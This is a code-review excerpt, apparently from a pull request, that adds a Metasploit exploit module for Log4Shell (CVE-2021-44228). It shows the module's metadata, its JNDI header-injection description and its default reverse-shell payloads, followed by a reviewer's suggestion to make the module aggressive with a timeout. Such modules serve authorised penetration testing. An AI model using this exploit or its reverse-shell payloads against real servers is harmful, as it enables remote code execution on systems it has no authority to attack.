modules/exploits/multi/http/log4shell_header_injection.rb

```diff
@@ -0,0 +1,314 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::JavaDeserialization
+  include Msf::Exploit::Java
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::LDAP::Server
+  def initialize
+    super(
+      'Name' => 'Log4Shell HTTP Header Injection',
+      'Description' => %q{
+        Send vulnerable header with JNDI injected URL from which the JVM will acquire
+        and execute attacker controlled data.
+      },
+      'Author' => [
+        'Michael Schierl', # Technical guidance, examples, and patience - all of the Jedi stuff
+        'juan vazquez', # 2011-3544 building blocks reused in this module
+        'sinn3r', # 2011-3544 building blocks reused in this module
+        'Spencer McIntyre', # HTTP scanner module for 2021-44228 and moral support
+        'RageLtMan <rageltman[at]sempervictus>' # Metasploit module and infrastructure
+      ],
+      'References' => [
+        [ 'CVE', '2021-44228' ],
+      ],
+      'DisclosureDate' => '2021-12-09',
+      'License' => MSF_LICENSE,
+      'DefaultOptions' => {
+        'SRVPORT' => 389
+      },
+      'Targets' => [
+        [
+          'Automatic', {
+            'Platform' => 'java',
+            'Arch' => [ARCH_JAVA],
+            'DefaultOptions' => {
+              'PAYLOAD' => 'java/shell_reverse_tcp',
+              'REMOTE_LOAD' => true
+            }
+          }
+        ],
+        [
+          'Windows', {
+            'Platform' => 'win',
+            'DefaultOptions' => {
+              'PAYLOAD' => 'windows/meterpreter/reverse_tcp',
+              'REMOTE_LOAD' => false
+            }
+          },
+        ],
+        [
+          'Linux', {
+            'Platform' => 'unix',
+            'Arch' => [ARCH_CMD],
+            'DefaultOptions' => {
+              'PAYLOAD' => 'cmd/unix/reverse_bash',
+              'REMOTE_LOAD' => false
+            }
+          },
+        ]
+      ],
+      'Notes' => {
+        'Stability' => [CRASH_SAFE],
+        'SideEffects' => [IOC_IN_LOGS],
+        'AKA' => ['Log4Shell', 'LogJam'],
+        'Reliability' => [REPEATABLE_SESSION]
+      }
+    )
```

Comment:
I think we're going to want to adjust this to being an aggressive stance with a timeout later on because we are triggering the vulnerability instead of waiting for someone to connect to us. The timeout should likely be configurable, though I'd consider just leveraging `WfsDelay` and setting it to a higher default value appropriate.

```suggestion
      },
      'Stance' => Msf::Exploit::Stance::Aggressive
    )
```

Reply:
I never liked internal tuning of wfsdelay, but yeah, lets do it as thats really what it was there for in the 1st place.